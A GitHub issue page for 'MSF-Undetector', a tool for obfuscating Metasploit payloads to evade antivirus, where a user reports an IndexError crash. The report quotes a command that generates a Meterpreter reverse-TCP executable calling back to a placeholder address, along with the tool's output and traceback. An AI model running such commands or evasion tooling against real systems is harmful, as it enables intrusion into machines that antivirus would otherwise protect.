kkar / MSF-Undetector

Metasploit python-payload obfuscation, to allow penetration testers bypass Antivirus solutions.
29 stars 15 forks source link

IndexError: list index out of range #5

Open DiamondLink opened 3 years ago

DiamondLink commented 3 years ago

Here is the input:

python msfud.py -p windows/meterpreter/reverse_tcp -a 11.11.11.11 -l 4444 -o msfudd.exe

And here is the output :

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes

Traceback (most recent call last): File "msfud.py", line 20, in <module> firstbase64 = re.findall(r"'(.*?)'", tmp, re.DOTALL)[1] IndexError: list index out of range